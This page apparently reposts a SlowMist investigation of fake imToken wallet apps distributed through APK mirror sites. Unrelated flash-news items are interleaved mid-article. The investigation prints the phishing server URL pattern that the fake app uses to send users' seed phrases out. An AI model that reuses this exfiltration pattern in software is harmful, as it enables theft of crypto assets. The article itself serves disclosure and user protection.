比特幣交易所 比特幣交易所
Ctrl+D 比特幣交易所
ads

慢霧:Web3假錢包第三方源調查分析_TOKE

Author:

Time:1900/1/1 0:00:00

原文作者:?山&耀

技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包“登錄”;這與我們傳統意義上的“登錄”不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行“登錄”,我們可以看到“登錄”錢包時顯示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而錢包是你在Web3世界中的唯一通行證。

慢霧:LendHub疑似被攻擊損失近600萬美金,1100枚ETH已轉移到Tornado Cash:金色財經報道,據慢霧區情報,HECO生態跨鏈借貸平臺LendHub疑似被攻擊,主要黑客獲利地址為0x9d01..ab03。黑客于1月12日從Tornado.Cash接收100ETH后,將部分資金跨鏈到Heco鏈展開攻擊后獲利,后使用多個平臺(如TransitSwap、Multichain、Uniswap、Curve和OptimismBridge)跨鏈或兌換被盜資金。截至目前,黑客已分11筆共轉1,100ETH到Tornado.Cash。被攻擊的具體原因尚待分析,慢霧安全團隊將持續跟進此事件。[2023/1/13 11:10:43]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

慢霧:疑似Gemini相關地址在過去5小時內共轉出逾20萬枚ETH:金色財經消息,慢霧監測顯示,疑似加密交易所Gemini相關地址(0xea3ec2a08fee18ff4798c2d4725ded433d94151d)已在過去5小時內歸集并轉出逾20萬枚ETH(超3億美元)。[2022/7/19 2:22:08]

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

據數據統計站點similarweb統計,apkcombo站點:

全球排名:?1,?809?

慢霧:nanotron安全審計報告是偽造的:慢霧科技發推表示:團隊并沒有對于nanotron進行審計,項目的安全審計報告是偽造的,請注意防范風險。[2020/10/8]

國家排名:?7,?370?

品類排名:?168?

我們可以看到它的影響力和流量都非常大。

它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?

我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:

https://play.google.com/store/apps/details??id=im.token.app

動態 | 慢霧:10 月發生多起針對交易所的提幣地址劫持替換攻擊:據慢霧區塊鏈威脅情報(BTI)系統監測及慢霧 AML 數據顯示,過去的 10 月里發生了多起針對數字貨幣交易所的提幣地址劫持替換攻擊,手法包括但不限于:第三方 JS 惡意代碼植入、第三方 NPM 模塊污染、Docker 容器污染。慢霧安全團隊建議數字貨幣交易所加強風控措施,例如:1. 密切注意第三方 JS 鏈接風險;2. 提幣地址應為白名單地址,添加時設置雙因素校驗,用戶提幣時從白名單地址中選擇,后臺嚴格做好校驗。此外,也要多加注意內部后臺的權限控制,防止內部作案。[2019/11/1]

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。

而apkcombo鏡像站的下載路徑為:

https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11?,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3?,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown

下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助記詞>

看下圖,最早的“api.funnel.rocks”證書出現在2022-06-03?,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

1?/imToken錢包:https://token.im/

2?/TokenPocket錢包:https://www.tokenpocket.pro/

3?/TronLink錢包:https://www.tronlink.org/

4?/比特派錢包:https://bitpie.com/

5?/MetaMask錢包:https://metamask.io/

6?/TrustWallet:https://trustwallet.com/

請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

Tags:WEBTOKCOMTOKEweb3域名交易VELO Token3COMMAS幣imToken官網版下載

pepe最新價格
以太坊上海升級10天后,當前網絡上都發生了哪些變化?_CEX

原文作者:21Shares分析師TomWan 原文編譯:PANews 以太坊上海升級已過去10天有余,當前網絡上究竟發生了什么變化呢?21Shares研究分析師TomWan用數據進行了解讀分析.

1900/1/1 0:00:00
比特幣和以太坊的短期和中期價格預測_以太坊

短期預測 比特幣(BTC) 大多數人預計,比特幣的價格將在不久的將來回落至27,000美元以下,與3月底的水平持平。值得注意的是,它在2023年的前幾個月一直保持在25,000美元以上.

1900/1/1 0:00:00
OKX Web3錢包現已支持Ordinals協議BTC NFT的展示和轉移_WEB

4月24日消息,據官方消息,OKXWeb3錢包插件端現已支持Ordinals協議BTCNFT的展示和轉移,是首個支持OrdinalsBTCNFT的多鏈錢包.

1900/1/1 0:00:00
對話Offchain Labs工程師:Arbitrum在ModuLar Oriented中如何解決Rollup面臨的問題?_BIT

原文標題:HowdoesArbitrumfinditsecoLogicaLnicheinModuLarOriented?原文作者:Vision.

1900/1/1 0:00:00
比特幣(BTC)可能會為另一場反彈預熱,這就是原因_SNO

盡管自年初以來比特幣(BTC)的價格走勢令人印象深刻,由于多種因素自1月以來飆升了80%以上,但由于其他原因,該資產在最近幾周暴跌。然而,根據最近的報道,該資產可能正準備再次反彈.

1900/1/1 0:00:00
DAOrayaki:L2網絡與比特幣生態系統的新可能性_RON

比特幣雖然長期以來一直被視為安全和去中心化的價值存儲,或者“數字黃金”,但不得不承認它支持更高級應用的潛力仍然相對未被開發.

1900/1/1 0:00:00
ads